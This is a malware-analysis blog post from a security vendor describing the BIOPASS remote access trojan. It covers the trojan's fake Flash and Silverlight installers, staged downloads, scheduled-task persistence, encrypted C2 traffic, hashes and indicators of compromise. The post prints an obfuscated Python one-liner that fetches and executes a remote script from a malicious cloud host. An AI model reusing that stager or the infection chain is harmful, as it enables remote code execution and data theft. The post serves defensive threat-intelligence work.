Behavioural Analysis of a sophisticated malware - BIOPASS RAT.

SecneurX has been observing a RAT (Remote Access Trojan) behaviour which is targeting users of Windows systems through the watering hole attack. This RAT is now referred as BIOPASS RAT.


The details shared in this blog are from the artifacts acquired from the wild using SecneurX acquisition Engine. SecneurX analysed these artifacts using SecneurX Advanced Dynamic Malware Analysis Platform and generated IOC’s (Indicators of Compromise), Malware’s behavioural analysis report and Threat Signatures that can be consumed by SOC / Security Analysts.


Victims are tricked into downloading a malware loader which is disguised as a legitimate installer like Adobe Flash Player or Microsoft Silverlight. This malware sets up a back-door entry for the Command & Control (C2) to control the victim’s system. It then downloads a tool-kit containing many tools to, capture screen shots, stream desktop content, steal credentials etc and waits for C2 to initiate the commands. Next, it establishes a socket connection with C2 that is running on a public cloud to exfiltrate data.


This malware has the potential to cause serious data exfiltration. It is important to watch your logs for any IOC’s mentioned at the end of this blog. A detailed analysis of the behaviour of BIOPASS RAT with network and process information is being discussed in-detail for interested readers. Preventive steps can be taken based on the IOC’s and behavioural report attached in this blog.

An analysis of the threat scenario is explained below.

  • Victims are tricked to download the malicious installers like Flash, Silverlight when they access compromised websites.

  • While installing, the malware downloads the genuine flash or silverlight installer from their custom source, like in this url.

hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/Silverlight[.]exe

  • The malware downloads a script (Python) from C2.

hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/1-CS-443[.]lua

  • This python script checks if the machine is already compromised or not, by checking whether there are listeners in specific port numbers - 43990, 43992, 53990, 33990, 33890, 48990, 12880, 22880, 32880, 42880, 52880, 62880

  • If the machine is not compromised already, it downloads subsequent payload.

hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/Schedule[.]lua

hxxp://lualibs[.]oss-accelerate[.]aliyuncs[.]com/x86/ScheduleTask[.]dll

hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip

  • The final payload was an obfuscated payload as listed below. It was decoded to extract the BIOPASS RAT payload url.

Obfuscated payload

"exec(b''.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d616363656c65726174652e616c6979756e63732e636f6d2f72322f626967322e70792729292e7265616428292e6465636f6465282929').decode())"

BIOPASS RAT URL after decoding

hxxp://flashdownloadserver.oss-accelerate[.]aliyuncs[.]com/r2/big2.py

  • The payload that was downloaded as mentioned in Step 4, contains a Toolkit that was downloaded from below URL.

hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip

  • The contents of the toolkit is shown in the below image. The toolkit contains python environment and its dependencies.

  • The BIOPASS RAT malicious script is downloaded from the below URL.

hxxp://flashdownloadserver.oss-accelerate.aliyuncs[.]com/r2/big2.py

  • To periodically start these dowloaded binaries, an entry is created in the Task scheduler.

  • BIOPASS malware script contains following tasks which can be initiated by the C2 to execute

  • This Malware can also deploy the cobalt strike payload from the below URL which was obfuscated in the code

hxxp://flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/c1222.txt

Payload:

  • Communication between the infected node and C2 is base85 encoded , compressed and AES encrypted.

Encrypted data

42["join",{"type":"client","data":"c$@*?03ZJ>jH4D#UVpo?^o7<}6%{}fj4Jv$ey?7woLCG3L!Pm^m)lSCttTFO7D$5<X6BZHa1nx)c>OG(KaGrvxrSQd(1I1tfz!&K08>;NY1S_`J<a&pbp*w^~_m80=BEu9&gKLyp*oYc7nk>4S(7+9BCV_an;BR4a`Ws|@yGxqYJdJ3>FixK5Q)ix8W@b~cnwK4K`D$#%B0div=dos=htppsbZx4Qh=@QEkVEVI72G7t>wy@u~0{zd#NJPIskliVsu=np$e^v5e1pSn)8T-{UJJW|MCWob("}]


Decrypted data:

{"do": "k", "ips": "192.168.17.132", "public_ip": "157.49.4.95", "osv": "Windows 7 x64", "cuser": "win-l842sfcie1t\\administrator", "pid": 2760, "key": "null", "uid": "1", "av": "N/A", "city": " \u70\ua6"}

  • C2 issues multiple commands like grab a screen shot, get browser history or stream the desktop and the Malware will execute and exfiltrate those data.

Hashes

e3183f52a388774545882c6148613c67a99086e5eb8d17a37158fc599ba8254b

69d930050b2445937ec6a4f9887296928bf663f7a71132676be3f112e80fe275

b82bde3fe5ee900a76ac27b4869ed9aa0802c63bbd72b3bfb0f1abce6340cc6c

bdf7ebb2b38ea0c3dfb13da5d9cc56bf439d0519b29c3da61d2b2c0ab5bc6011

bf4f50979b7b29f2b6d192630b8d7b76adb9cb65157a1c70924a47bf519c4edd

6ee8f6a0c514a5bd25f7a32210f4b3fe878d9d417a7ebe07befc285131bae10e

b041e6269143175c32737be0345fca5574039cc8df37f06effdd93131a3b8dd5

8445c0189735766edf0e3d01b91f6f98563fef272ac5c92d3701a1174ad072dd

cddff76910cafdc30d80e383efb801ebdcee5bdb95c2e84af25935be45fde053

cbd7b4afc69e7e68893a52096bb1bd8c2f89c7c0da32771169a4bfe13efe8698


Indicators Of Compromise

hxxp[:]//softres[.]oss-accelerate[.]aliyuncs[.]com/Silverlight[.]exe

hxxp[:]//lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/1-CS-443[.]lua

hxxp[:]//lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/Schedule[.]lua

hxxp[:]//lualibs[.]oss-accelerate[.]aliyuncs[.]com/x86/ScheduleTask[.]dll

hxxp[:]//softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip

hxxp[:]//flashdownloadserver[.]oss-accelerate[.]aliyuncs[.]com/r2/big2[.]py

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/Online[.]txt

hxxp[:]//d[.]pythonlabs[.]net[:]39999/socket[.]io/?transport=polling&EIO=3&t=1626096081[.]4416115

hxxp[:]//d[.]pythonlabs[.]net[:]39999/socket[.]io/?transport=websocket&EIO=3&sid=86787aa8f944daf83f46aba2021&t=1626096084[.]6552172

hxxp[:]//pythonlabs[.]oss-accelerate[.]aliyuncs[.]com/sc[.]exe

hxxp[:]//pythonlabs[.]oss-accelerate[.]aliyuncs[.]com/V2%2F93446a%2FChrome%2FBookmarks%2F1626096085[.]7940192_Bookmarks

hxxp[:]//pythonlabs[.]oss-accelerate[.]aliyuncs[.]com/V2%2F93446a%2FChrome%2FHistory%2F1626096085[.]762819_History

hxxp[:]//lualibs[.]oss-accelerate[.]aliyuncs[.]com/x86/pngquant[.]exe

hxxps[:]//softres[.]oss-accelerate[.]aliyuncs[.]com/rce[.]payload

hxxp[:]//www[.]flash[.]cn/enterprise/index

hxxp[:]//www[.]flash[.]cn/education/index

hxxp[:]//www[.]flash[.]cn/help/index

hxxp[:]//www[.]flash[.]cn/notice/index

hxxp[:]//www[.]flash[.]cn/category/contact

hxxp[:]//www[.]flash[.]cn/category/agreement

hxxp[:]//www[.]flash[.]cn/Flash_Helper_Service_Agreement[.]pdf

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/ServiceHub[.]zip

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/vc_redist[.]x86[.]exe

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/ffa[.]exe

hxxp://flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/c1222[.]txt

hxxp://flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/cdaemon[.]txt

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/csplugins/xss[.]txt

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/csplugins/script[.]txt

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/csplugins/ignore[.]json

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/csplugins/script[.]txt

hxxp[:]//ciscobinary[.]openh264[.]org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a

391d521[.]zip

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res%2Ffiles[.]zip

hxxp[:]//chinanode[.]microsoft-update-service[.]com/socket[.]io/?transport=polling&EIO=3&t=1626342488[.]2829416

hxxp[:]//chinanode[.]microsoft-update-service[.]com/socket[.]io/?transport=polling&EIO=3&sid=be6c4f0c96be4e91e99285204664&t=1626342489[.]718144

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/V2%2Fb6e8c5%2FChromeN%2FBookmarks%2F1626342490[.]669746_Bookmarks

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/V2%2Fb6e8c5%2FChromeN%2FHistory%2F1626342490[.]5917456_History

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/V2%2Fb6e8c5%2Fscreenshot%2F1626342491[.]886548_92669[.]png

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/unzip[.]exe

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/flashplayerpp_install_cn[.]exe

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/cdaemon[.]txt

hxxp[:]//flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/xxa[.]txt


Device Indicators

C:\Users\ADMINI~1\AppData\Local\Temp\lua.zip

C:\ProgramData\lua\lua\socket\smtp.lua

C:\ProgramData\lua\lua\socket

C:\ProgramData\lua\lua.exe

C:\ProgramData\lua\effil.dll

C:\Users\Administrator\AppData\Roaming\Silverlight.exe

C:\Windows\System32\Tasks\Silverlight

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\administrator@msn[1].txt

C:\ProgramData\lua\ScheduleTask.dll

C:\ProgramData\ShellExperienceHost\api-ms-win-crt-stdio-l1-1-0.dll

C:\ProgramData\ShellExperienceHost\Lib\site-packages\oss2\task_queue.py

C:\Windows\System32\Tasks\ShellExperIenceHost


Behaviour report

75e03f40a088903579a436c0d8e8bc3d0d71cf2942ad793cc948f36866a2e1ad

6ee8f6a0c514a5bd25f7a32210f4b3fe878d9d417a7ebe07befc285131bae10e


Conclusion

Given the nature of the malware, we advise users to be careful with regard to the applications that they download. Organisations can take preventive steps based on the IOC’s and behavioural report attached in this blog.



133 views0 comments